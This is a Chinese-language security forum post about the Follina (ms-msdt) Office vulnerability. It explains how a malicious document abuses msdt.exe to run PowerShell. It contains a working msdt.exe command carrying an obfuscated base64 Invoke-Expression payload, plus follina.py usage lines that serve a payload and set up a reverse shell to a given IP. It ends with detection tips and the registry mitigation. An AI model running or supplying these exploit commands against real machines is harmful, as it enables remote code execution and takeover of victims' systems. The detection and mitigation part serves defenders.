该漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ms-msdt
URI执行任意PowerShell代码。
目前已知影响的版本为:
在cmd中运行即可弹出计算器:
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
https://otp.landian.vip/zh-cn/download.html
https://github.com/chvancooten/follina.py
python3 .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 192.168.84.205
https://github.com/JohnHammond/msdt-follina
python -m http.server 8080
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #-r为反弹shell的端口,这里暂时用不到
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #这里用到了 -r 反弹shell
从cmd/msedge/office这些进程诞生的msdt.exe进程是可疑的。
msdt.exe里参数带有/../../xxxx/.exe,恶意payload。 直接检测这个也是可以的。
撤消解决方法:
reg export HKEY_CLASSES_ROOT\ms-msdt filename
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
reg import filename
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
F0re4t | 4.00 | 0 | 2022-06-14 19:07:28 | 一个受益终生的帖子~~ |
君叹 | 4.00 | 0 | 2022-06-14 10:10:44 | 一个受益终生的帖子~~ |
Track-劲夫 | 100.00 | 0 | 2022-06-13 19:07:56 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
君叹
发表于 2022-6-14
爱了爱了
评论列表
加载数据中...